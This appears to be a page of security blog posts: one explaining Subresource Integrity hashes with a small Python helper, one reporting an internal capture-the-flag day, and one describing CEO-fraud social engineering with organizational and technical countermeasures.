Websites nowadays are mostly built with resources from different origins. For example, many sites include scripts or stylesheets such as jQuery or Bootstrap from a Content Delivery Network (CDN). This means webmasters implicitly trust the linked external sources. But what if an attacker can force the user to load content from an attacker-controlled server instead of the genuine resource (e.g. by DNS poisoning, or by replacing files on a CDN)? Until now, a security-aware webmaster had no way to protect his website against such an incident.

This is the point where Subresource Integrity kicks in. Subresource Integrity ensures the integrity of external resources with an additional attribute for the two HTML tags <link> and <script>. The integrity attribute contains a cryptographic hash of the external resource to be included in the site. The browser then checks whether the hash of the fetched resource and the hash in the HTML attribute are identical.

Bootstrap example:

<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css" integrity="sha384-1q8mTJOASx8j1Au+a5WDVnPi2lkFfwwEAa8hDDdjZlpLegxhjVME1fgjWPGmkzs8" crossorigin="anonymous">

In the example above, the resource bootstrap.min.css is checked for integrity using its Base64-encoded SHA-384 hash. If the integrity check passes, the browser applies the stylesheet (or executes the script in the case of a <script> tag). If the check fails, the browser must refuse to apply the stylesheet or execute the script. The user is not informed when the check fails and a resource therefore could not be loaded; the failed request can only be seen in the developer tools of the browser. The following image shows the error message in the Chrome developer tools.

The browser console informs about a failed subresource integrity check.

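The integrity value itself is straightforward to compute. A minimal Python sketch (the file name in the comment is illustrative); in practice, openssl or shasum can produce the same digest:

```python
# Sketch: compute the base64-encoded SHA-384 digest used in the
# integrity attribute of <link> and <script> tags.
import base64
import hashlib

def sri_hash(data: bytes, algo: str = "sha384") -> str:
    """Return an SRI string like 'sha384-<base64 digest>'."""
    digest = hashlib.new(algo, data).digest()
    return f"{algo}-{base64.b64encode(digest).decode()}"

# For a downloaded copy of e.g. bootstrap.min.css you would do:
# with open("bootstrap.min.css", "rb") as f:
#     print(sri_hash(f.read()))
print(sri_hash(b"body { color: red }"))
```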

The crossorigin attribute in the example configures the CORS request. The value anonymous indicates that requests for this element will not have the credentials flag set, and therefore no cookies are sent. A value of use-credentials would indicate that the request provides cookies to authenticate.

The subresource integrity attribute is currently being reviewed before becoming a W3C standard, but is already supported by Chrome 45+, Firefox 43+ and Opera 32+.

In conclusion, the subresource integrity attribute gives webmasters a better way to ensure the integrity of external resources. However, the attribute is not supported by older browsers and needs to be adjusted on every resource change. In the end, a security-aware webmaster keeps more control with less effort by hosting all resources on his own servers.

Come’n’Hack Day 2015

Being a security analyst at Compass Security is an interesting thing, no doubt. Besides interesting projects, there is plenty of know-how transfer and interactions between the employees. For example, each year, all security analysts come together for an event called Come’n’Hack Day. During this year’s event, they had the pleasure to perform an attack/defense hacking contest against each other.


Hacking-Lab‘s new Capture The Flag (CTF) system was used for this purpose. It was only the second time this system was used for an event, after the premiere at the European Cyber Security Challenge final last October in Lucerne.


The participants were spread over three teams: Proxy Foxes, Lucky Bucks and Chunky Monkeys. Each team owned servers with running applications and had different tasks to perform in order to score points:

  • ATTACK – Attack the other teams’ applications and steal a gold nugget.
  • DEFENSE – Protect their own applications.
  • CODE-PATCHING – Find and patch vulnerabilities in their own applications.
  • AVAILABILITY – Keep their own applications up and running.
  • JEOPARDY – Solve hacking challenges (cryptography, networking, etc.).
  • POWNED – Try to exploit the other teams’ servers.

After a hard fight, the Chunky Monkeys grabbed the first place, closely followed by the Lucky Bucks:


Almost one hundred gold nuggets were stolen during the day:

All attendees enjoyed the highly eventful day. With six different ways to score points, each participant could contribute to their team’s success. This makes such a CTF not only a great social event for security analysts but potentially for any organization with technically skilled employees (IT security officers, sysadmins and/or developers)!

What is a “Fake President Fraud” and how to Protect Your Company

“Fake President Fraud” or “CEO Fraud” is a social engineering attack where an adversary tries to convince a member of the financial department of a company to send out a payment to the attacker’s bank account. The attack can be divided into three steps.

  1. Establish Contact:
    Typically, only employees responsible for bank transfers are contacted by the adversary, as they have all the permissions needed to execute payments. The criminal therefore impersonates a CEO or another superior who has enough authority to arrange urgent payments.
    These kinds of social engineering attacks work if the adversary gathers enough information about the individual he wants to impersonate. As most CEOs are referenced on the web with detailed personal information such as a curriculum vitae and email address, it is easy for an attacker to gather everything he needs to fake a CEO email. Furthermore, company websites often disclose information about customers and other useful details which help an adversary be more convincing when requesting a payment.
  2. Request Payment Transaction:
    The attacker often uses email (spear phishing) or phone calls (vishing) to contact his target. While a phone call only works if the victim does not know the voice of the impersonated superior, an attack over email has no such restrictions.
    The request itself concerns an urgent payment to a foreign bank account and uses a variety of pretexts such as acquisitions or customer projects. For this step to succeed, the criminal uses different elements to convince the target to comply with his request and send out the payment:

    1. Authority: Approaching the target as an authority figure adds a strong argument to every request. Jonathan J. Rusch writes: “People are highly likely, in the right situation, to be highly responsive to assertions of authority, even when the person who purports to be in a position of authority is not physically present.” One of the most impressive experiments in the history of social psychology, which demonstrated blind obedience to authority figures, is the Stanley Milgram experiment.
    2. Valorization: The “fact” that the CEO or a superior has “chosen” this specific employee implies that he trusts him. The feeling of being trusted makes the body release oxytocin, often referred to as the “love hormone”. This hormone facilitates trust and attachment between individuals, an additional factor that helps the attacker quickly build rapport and convince the target to comply with his request and send out the payment.
    3. Secrecy: In order to prevent the target from verifying the authenticity and validity of an order, attackers often label the request as “STRICTLY CONFIDENTIAL” or insert statements like “this project is still secret and its success depends on this transaction”.
    4. Pressure: By shifting all the responsibility for the success or failure of a project onto the target’s shoulders, the attacker puts a lot of pressure on him. This induces the victim to be more compliant and execute the request.
    5. Urgency: Urgency and authority are a good combination to convince the target to perform the payment as fast as possible. The attacker creates a false sense of urgency in order to push the target into a rushed judgment or a rash decision. Example email:
  3. Transfer Money:
    If the attacker manages to convince the targeted employee to send out the payment, the money is transferred to the foreign bank account.

 

Now the question arises what a company can do to avoid a “Fake President Fraud”. Different organizational and technical measures can be taken to mitigate the risk of an incident.

  1. Organizational:
    1. If possible, email or phone communication should not be allowed for authorizing large payments; face-to-face meetings should be mandatory instead.
    2. Develop and communicate guidelines and processes for how payment transactions need to be handled.
    3. If a transaction does not fit the defined process, the employee should be required to ask verification questions that confirm the request is authorized.
    4. Employees should participate in a dedicated social engineering training to learn how to avoid being manipulated by an attacker. The goal of the course should be to convey how an attacker thinks, raise general awareness for social engineering attacks and explain that such attacks are not limited to one communication channel (e.g. email, SMS, WhatsApp, in person).
    5. Publish only as little financial and personal information on social media and company websites as necessary. This makes it harder for an adversary to prepare his attack.
    6. A two-step (four-eyes) verification process for sending out large amounts of money to foreign bank accounts helps mitigate the damage of an attack. It is important that the company culture allows the second person to actually review the payment and challenge the first person, without either of them fearing a “Big Brother” system.
    7. Do not allow employees to use their personal email address for business purposes. This prevents a compromised private email account from giving access to business data.
  2. Technical:
    1. Do not accept emails from external mail servers on your own mail server when the sender address contains your own domain name.
    2. Always use email signatures/encryption (e.g. S/MIME, PGP), at least when sending mails with confidential and/or sensitive content.
    3. Mark emails from external mail servers with a tag inside the subject (e.g. [EXTERNAL]). This should be done when the emails enter the company’s mail server. With conditional formatting, such mails can additionally be marked in red if they originate outside the company.
    4. To prevent Outlook Web Access from being hacked and used to perform a CEO fraud, a strong authentication method should be used in addition to a strong password policy (e.g. client certificates, two-factor authentication or access restricted to VPN traffic only).
    5. Attackers may register and use similar-looking domains for a CEO fraud attack. The company should therefore check whether similar domains already exist (e.g. .co instead of the .com top-level domain) and blacklist them on its mail server.
    6. Additionally, the company should try to register all similar-looking domains itself to make it harder for an attacker to register a domain that looks slightly different from the company’s own.
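The lookalike-domain check mentioned above can be partly automated. A minimal sketch that generates simple variants of a company domain (TLD swaps and common character substitutions) for blacklisting or monitoring; the substitution table and TLD list are illustrative examples, not an exhaustive set:

```python
# Illustrative sketch: generate lookalike variants of a company domain.
# The swap table and TLD list below are examples only; real typosquatting
# tooling covers far more cases (homoglyphs, insertions, bitsquatting, ...).
def lookalikes(domain: str):
    name, _, tld = domain.rpartition(".")
    variants = set()
    # Similar top-level domains, e.g. .co instead of .com
    for alt_tld in ("co", "cm", "com", "net", "org"):
        if alt_tld != tld:
            variants.add(f"{name}.{alt_tld}")
    # Visually similar character substitutions in the domain name
    swaps = {"o": "0", "l": "1", "i": "1", "m": "rn"}
    for i, ch in enumerate(name):
        if ch in swaps:
            variants.add(f"{name[:i]}{swaps[ch]}{name[i + 1:]}.{tld}")
    return sorted(variants)

print(lookalikes("compass.com"))
```

Candidate domains generated this way can then be checked against WHOIS data and, if unregistered, bought defensively or blacklisted on the mail server.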

Even though the described attack is a real threat, exploited by attackers around the world every day, there are effective steps to mitigate the risk of an incident, as shown above. In particular, an awareness training where employees are taught when to be suspicious and how attackers try to manipulate people is recommended, as this is the best protection against different types of social engineering attacks.